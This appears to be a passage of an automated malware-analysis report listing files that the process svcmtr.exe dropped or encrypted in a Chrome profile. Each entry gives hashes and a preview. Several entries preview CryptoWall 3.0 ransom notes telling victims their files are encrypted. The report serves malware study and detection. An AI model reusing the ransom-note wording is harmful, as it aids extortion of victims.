                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..I9.AP.2........4.....tA.j...%.....$...M._..M..ys..`..~..[\D.R..-.......h..d....1....1.Z.,L<Y.......)6.m'.z.^......QM..._....+3..R......c.R.H.(....m.:i...S7...].<7.OG.e..x.a.....f.+..Ve..(..W.

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1086
                                                                                                                          Entropy (8bit):7.488693678598227
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2CAAsmswIKi8nlM1kpMx7e8JSnMpsIr141dQ8:c+9U40oDgxAQ8alrpS7hJSosIS1dN
                                                                                                                          MD5:CF52B686D4DE13AD25F3525EA9A3E358
                                                                                                                          SHA1:05CE55497495AEEB3053C55A4CEEBE71CB6AFB8C
                                                                                                                          SHA-256:BE88E3D2BD8513AFD210D12F8FD6F9E89FB92E11A23FCD148E8E6E58073C4E93
                                                                                                                          SHA-512:78A16C35CC4BBBD374C8D66846AE3421FA06E985DEA5D14D2F40B481CAD3D8C0BEF8871C108D86A99D6A9ACD8944DB5A01A8E219E56A44AD1CACCD0F049DF5AD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.. ....7.......o.O.....*......9.0<...b....^.N.....D..df..M...>.8..E]..P.<..X..X..._v^...H..."/K...r..<.~..U?.G..jYA..qMo.].....s@..M).".[.DU.>@.Z....Fz%.b.(+....6...'..=.b.........@}...c.XA..&Ipg@...<kOv....r........Cr..V.:N{...c.M. .j..d}.P.......Y=..\........`..N...G.]qu........m<......F/L3G....0......e..T.q.......>...P:3.......~wX..%2YE.:r...8@.....&y.oS-...8.F.}...........&.[...U!4....&1.|zl.<.zH...`K..Z..Y..C.....uN.8..T.....9%G..q#.;b^A.a.|2D7.Z....i......-!'....1E[f.`.9..].......... *...(.......eD1....(<-...<..`q(.f...k....Itm..J..*..%9..j..2...,a..(....

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.380851703458764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2jhtrPk6aubiqSRc+RfvUOWmsz1mj:c+9U40oDgUfaub/+0Oqmj
                                                                                                                          MD5:05F94BAAE206FD34B044AABCABE99441
                                                                                                                          SHA1:68050D025B505319020E12DC1D9470AE7CC2F178
                                                                                                                          SHA-256:BCFF2B3EB1144A3007B84696C940A4AB441F5F063CDC73F4F30B1F7AC79D89A8
                                                                                                                          SHA-512:F3E1265B493FAAA34C32431BFFF99F81428F7E9BC8B2137932D42B0D9CC5F563F8CC3A5924A07C4DE58C71E5632656068C75409EA8854E045134CBCFDF005165
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....(..ytJ>0.T.6..N....B.w..4.5.....(5fw.Gk.w;....>..ub9..V....,R........Tk..`...%...d....H..NLf..X<.y..i=..vJ..(.:x..x...fd....R....w..&..7zc|?.X.x.?.s.k..TQ}.e.b.8..........UU...a........!A.}...eT.5.....i.#.s..o.........+....X....G......}%e..y%.B.C#1.......c../..CE..x..Zz.....Y.^x.9~..........f......D4~|.".(`G..D.....|..U,Z.y<m..V7r.%.....i.....(....[:..P`V~...~1Dg0d..V..<..$..?......J.W..0.)...R]a.k..sI<n..~v*.{m..9..mW..g....9.|#..S.w. ..%p9..G......DIj..{Q..N.LT......D....5...{..VI....!..h.IR=]...1.... A....0.o#.N...`rA..N...lC.G..FX..i....".czZ...'.hz.tc0....q..g

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.387367768699737
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S29A0ktlpQSYhpcw2v2byGGT8BimA:c+9U40oDgsTkLySYhSFv2bBa8B3A
                                                                                                                          MD5:89FF5C0CB9FD291991D6E6E93CE3555F
                                                                                                                          SHA1:39623AE94B632A6C10F8368888549B7891B050B2
                                                                                                                          SHA-256:60A49C41CC2650A024DF4E8DD295CF2C4AB285A2F4CF518CB4C65CE27BC7A5EA
                                                                                                                          SHA-512:0984D80150B557D24966BCAD0184A7299A96AD010AC3A732161EA3BF55270AD22D4D3F63205D785F2F15B4573B35C6A1BD719B8BA483BFEE87E422F3FF5B0841
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....~3.X..[9\....N...G.....O......3.Q.H1..j..P...BAb.....TLD....2....P*..+J..{.%.v.?...c.C..................R...`.....%.i.....=W...#...7..Z..W.i..\....3W..*.e.J.~.p...)..*.g..G.X.p..:Zg......^=.N...y.t..=a.....y.#.v.#.3.9...@.z..7...7S.....@.'....8..?[.P.z.Au.......*....u..V.DK..J....un.D.UBv..CL`.OM.p.e.[RT..H."...M..uj....&....T.[....,....f<...IP.... ..!.b.H...lk...E.f...VPV.......9x...gv...."..>*_..7..D}.q.!......Y>Rq...VE....5..6.OLND.H.z*..W+1..v............F..B2....+.?....P.=.%w...sZ./......oMp.).r....9...".....Q8ia ......M..e...u...4...XR.TW................JZVm%9%...

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.473332774075749
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2uszlZSvQIyeY2QENraw2stMXo8Zx:c+9U40oDg9IIRQsawTkx
                                                                                                                          MD5:AA0B892421F843C22C0A3115BA165CFC
                                                                                                                          SHA1:CC196BEF1F5E6DF307D22797F5813E539FCB421A
                                                                                                                          SHA-256:1A276CF2A1900DB92DD97708F455B6A20F4B36FFE53788BFD0E6E52F63D12D57
                                                                                                                          SHA-512:BE2973607C8710302FFF86FC7CE1C81A47B67F1D54E1A7AE1ADFABBF25BB38A595B53BE9B63FB08CB687AB7B7B92012430F7909B49104C5E93793BC3E1E8A06F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......=....8Zd....N...x'...D..a...N.aO.......#...Gz:zP@S...D......Y..g....+.......h..*O....T......k...r....z]I.q..f.M.0x...,To..E...P....8...rL.q....rhJ.....r.....H......sLn.-...@.......;...A.t..i..Q..y.?..]*.....l.R..2/.&.w8Qv.G.....I....>..A.].{..f..bUSv.`..."O..i.c...e..?!. ..\.....U....tQM..?2_.k.f.....~...U.O...}....)....s...5..."..a.....j.l.f.'.H....`.;.t]....../....E^.{o.Q...E......0....,......"..5".h<..J.y4g;8.s...M-$........Z..h.Xs.;=...ejv..7>k>..2..k..;a.....R..C...z..:R.....t<.nn...6}............gD....}k@.j.).i.p.y.T......>C.X.....T..G..........K.i.....

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\128.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2430
                                                                                                                          Entropy (8bit):7.842174024715984
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgZyqGo7njjm6UmPEaMxnQaCxMxJ0/MfDsFJRkB8uqg1T:cztoD2yqGo7n3m6Um0QaCwGIDbqg1T
                                                                                                                          MD5:15C0913F0899166B573B11B6D45B353C
                                                                                                                          SHA1:1D04B656D6D782A88201A044F7EA732819D25FE4
                                                                                                                          SHA-256:84B1363506860BEAF0B99BB8C7B3E2A1BCFFDCBC24B0936795C6AD6D4C36A113
                                                                                                                          SHA-512:BB08F9086D087D224A86DF86EEE6210BEEA57930D8F849C3F7F0E6BAA80C6C1BDE6A23B68B8F70CF208BBB7EBD72895D7C05BD6B82E84E5583AA6BD98ECEE038
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....Z......Bb........;F..<t.4..WP.....&K.e...."|>@..V!H4.wM;.l.g_..B....z......:8MN.Ba.uX..B.o..:~.1...<.].9.b.J.3...q..x.....Wz.......r........d6<',..D....?0..k...J.]...3[.S.RrqBu.w.X.=W.v.4.(.h*..$..x......3=..........h....XH.)v....`.yV..s.s._..Y...u.........1...vq..M.h..m.Bf.d.X....ed...l..8...~..WO..<+.....S;.m [...W'..&.I....d..>:..Aa.....Xm...U...n...SjC.#......2.64c......IQ..iZ...<..T.K..no,,...'.d:..a...z.:U.....C.. V....xv..N.c8J..@HmK.!.5.T[......VX...mS={z8..S...Y..R.m+.T.lF._.T..M..e..|...r^.)LNE#.i....f*..;...=)A.........}..X..{.b........|Q..e...i...y.SW.l.5.v.W.

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

